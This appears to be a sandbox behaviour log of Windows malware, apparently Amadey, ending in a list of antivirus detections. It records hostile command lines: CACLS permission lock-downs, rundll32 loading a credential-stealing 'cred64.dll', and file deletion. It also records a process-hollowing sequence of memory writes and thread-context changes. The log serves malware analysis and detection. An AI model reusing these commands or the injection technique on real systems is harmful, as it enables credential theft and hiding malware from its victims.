command_line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "test22:N"&&CACLS "gntuud.exe" /P "test22:R" /E&&echo Y|CACLS "..\4ca685c424" /P "test22:N"&&CACLS "..\4ca685c424" /P "test22:R" /E&&Exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000250
1 1 0

CreateProcessInternalW

 thread_identifier: 3068
thread_handle: 0x0000044c
process_identifier: 3064
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000025001\TeamViewerSetupx64.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000438
1 1 0

CreateProcessInternalW

 thread_identifier: 2160
thread_handle: 0x000003bc
process_identifier: 2140
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\1000028000\explorer.exe"
filepath_r: C:\Users\test22\AppData\Roaming\1000028000\explorer.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000438
1 1 0

CreateProcessInternalW

 thread_identifier: 2180
thread_handle: 0x00000440
process_identifier: 2184
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe"
filepath_r: C:\Users\test22\AppData\Roaming\1000030000\TeamViewer_Desktop.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000044c
1 1 0

CreateProcessInternalW

 thread_identifier: 2812
thread_handle: 0x000003b8
process_identifier: 2648
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000450
1 1 0

CreateProcessInternalW

 thread_identifier: 1520
thread_handle: 0x00000464
process_identifier: 2964
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000047c
1 1 0

CreateProcessInternalW

 thread_identifier: 2772
thread_handle: 0x00000470
process_identifier: 2756
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000480
1 1 0

CreateProcessInternalW

 thread_identifier: 2128
thread_handle: 0x00000474
process_identifier: 2028
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\96facdca63b65f\cred64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000478
1 1 0

CreateProcessInternalW

 thread_identifier: 2744
thread_handle: 0x0000008c
process_identifier: 2740
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2784
thread_handle: 0x00000088
process_identifier: 2780
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "gntuud.exe" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 2836
thread_handle: 0x0000008c
process_identifier: 2832
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "gntuud.exe" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2884
thread_handle: 0x0000008c
process_identifier: 2880
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

 thread_identifier: 2920
thread_handle: 0x00000094
process_identifier: 2916
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\4ca685c424" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 2976
thread_handle: 0x0000008c
process_identifier: 2972
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\4ca685c424" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

NtResumeThread

 thread_handle: 0x000000a0
suspend_count: 1
process_identifier: 2780
1 0 0

NtResumeThread

 thread_handle: 0x0000009c
suspend_count: 1
process_identifier: 2832
1 0 0

NtResumeThread

 thread_handle: 0x000000a0
suspend_count: 1
process_identifier: 2916
1 0 0

NtResumeThread

 thread_handle: 0x00000098
suspend_count: 1
process_identifier: 2972
1 0 0

NtResumeThread

 thread_handle: 0x000000ec
suspend_count: 1
process_identifier: 2140
1 0 0

CreateProcessInternalW

 thread_identifier: 2268
thread_handle: 0x00000224
process_identifier: 2248
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\system32\cmd.exe" /c del C:\Users\test22\AppData\Roaming\100002~1\explorer.exe > nul
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000228
1 1 0

NtResumeThread

 thread_handle: 0x00000224
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

 thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

 thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2648
1 0 0

NtResumeThread

 thread_handle: 0x0000023c
suspend_count: 1
process_identifier: 2648
1 0 0

CreateProcessInternalW

 thread_identifier: 2908
thread_handle: 0x000003a4
process_identifier: 2912
current_directory: C:\Users\test22\AppData\Local\Temp\4ca685c424
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANgAwAA==
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003b4
1 1 0

CreateProcessInternalW

 thread_identifier: 2728
thread_handle: 0x0000038c
process_identifier: 2768
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\1000043001\LanguageTool.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000170
1 1 0

NtGetContextThread

 thread_handle: 0x0000038c
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2768
region_size: 278528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000170
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $SG*Þ&D&D&D\^GŒ&D\^AŒ‚&D\^@Œ&DES@Œ&DESGŒ&DESAŒ &D\^EŒ&D&E„&DÕSAŒ&DÕS»&DÕSFŒ&DRich&DPEL#q–cà öS% @@@ܪ<ðà¸2¼‚Àƒ؂@ x.text@ `.rdataR“ ”@@.dataÌ*À œ@À.rsrcàð¨@@.reloc¸24ª@B
base_address: 0x00400000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00432000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer: Ä#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#CÄ#CÔ#C(Cÿÿÿÿÿÿÿÿ€±¿DNæ@»u˜ÿÿÿÿ “   ÿÿÿÿHLCˆÂCˆÂCˆÂCˆÂCˆÂCÀÇCÈNCHPC ECÈÁC˜ÂCC  abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þÈC˜êC˜êC˜êC˜êC˜êC˜êC˜êC˜êC˜êCÈCœêCœêCœêCœêCœêCœêCœêC..þÿÿÿþÿÿÿŒ7C.?AVbad_array_new_length@std@@Œ7C.?AVbad_alloc@std@@Œ7C.?AVexception@std@@Œ7C.?AVruntime_error@std@@Œ7C.?AVlogic_error@std@@Œ7C.?AVlength_error@std@@Œ7C.?AVout_of_range@std@@Œ7C.?AVsystem_error@std@@Œ7C.?AV_System_error@std@@Œ7C.?AVbad_exception@std@@Œ7C.?AVerror_category@std@@Œ7C.?AV_Generic_error_category@std@@Œ7C.?AVtype_info@@
base_address: 0x0043c000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer: €0€ H`ð}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0043f000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00440000
process_identifier: 2768
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2768
process_handle: 0x00000170
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4334931
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000038c
process_identifier: 2768
1 0 0

NtResumeThread

 thread_handle: 0x0000038c
suspend_count: 1
process_identifier: 2768
1 0 0

NtResumeThread

 thread_handle: 0x000002a8
suspend_count: 1
process_identifier: 2912
1 0 0

NtResumeThread

 thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 2912
1 0 0

NtResumeThread

 thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2912
1 0 0

NtResumeThread

 thread_handle: 0x00000494
suspend_count: 1
process_identifier: 2912
1 0 0

NtResumeThread

 thread_handle: 0x00000168
suspend_count: 1
process_identifier: 2964
1 0 0
Bkav W32.AIDetect.malware2
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
McAfee RDN/Real Protect-LS
Cylance Unsafe
Sangfor Riskware.Win32.Agent.V9a4
K7AntiVirus Riskware ( 0052f7bd1 )
Alibaba Trojan:Win32/Crampes.6ae16964
K7GW Riskware ( 0052f7bd1 )
Cybereason malicious.0cca09
Symantec ML.Attribute.HighConfidence
tehtris Generic.Malware
ESET-NOD32 Win32/RiskWare.PEMalform.J
APEX Malicious
Kaspersky HEUR:Trojan.Win32.Crampes.a
BitDefender Trojan.GenericKD.64168461
MicroWorld-eScan Trojan.GenericKD.64168461
Avast Win32:Evo-gen [Trj]
Tencent Win32.Trojan.FalseSign.Ximw
Ad-Aware Trojan.GenericKD.64168461
Emsisoft Trojan.GenericKD.64168461 (B)
VIPRE Trojan.GenericKD.64168461
TrendMicro Trojan.Win32.AMADEY.YXCLJZ
McAfee-GW-Edition RDN/Real Protect-LS
Trapmine malicious.high.ml.score
FireEye Generic.mg.d332cf184ac8335d
Sophos Mal/Generic-S
GData Trojan.GenericKD.64168461
Jiangmin Trojan.Crampes.dv
Antiy-AVL Trojan/Win32.Dynamer
Gridinsoft Trojan.Win32.Agent.cl
Arcabit Trojan.Generic.D3D3220D
ZoneAlarm HEUR:Trojan.Win32.Crampes.a
Microsoft Trojan:Win32/Amadey.PAB!MTB
AhnLab-V3 Downloader/Win.Amadey.C5329944
MAX malware (ai score=89)
Malwarebytes Malware.AI.1616178918
TrendMicro-HouseCall Trojan.Win32.AMADEY.YXCLJZ
Rising Trojan.Swrort!8.296 (TFE:2:CCuO7nvtECH)
SentinelOne Static AI - Malicious PE
Fortinet Riskware/PEMalform
BitDefenderTheta Gen:NN.ZexaF.36106.tC2@aqUFHgli
AVG Win32:Evo-gen [Trj]
Panda Trj/CI.A